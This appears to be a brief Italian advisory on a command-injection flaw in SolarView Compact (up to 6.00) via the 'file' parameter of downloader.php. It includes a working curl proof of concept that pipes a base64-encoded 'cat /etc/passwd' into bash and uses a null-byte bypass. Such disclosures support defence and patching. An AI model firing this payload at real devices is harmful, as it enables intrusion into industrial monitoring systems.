
Esiste una vulnerabilità di iniezione di comandi in SolarView Compact fino alla versione 6.00, gli attaccanti possono eseguire comandi bypassando le restrizioni interne tramite downloader.php.
C'è una vulnerabilità di iniezione di comandi in SolarView Compact fino alla versione 6.00, gli attaccanti possono eseguire comandi bypassando le restrizioni interne tramite downloader.php.
curl http://example.com/downloader.php?file=;echo%20Y2F0IC9ldGMvcGFzc3dkCg==|base64%20-d|bash%00.zip | grep root:.*:0:0
I comandi possono essere iniettati bypassando le restrizioni interne accedendo al parametro file della pagina downloader.php.
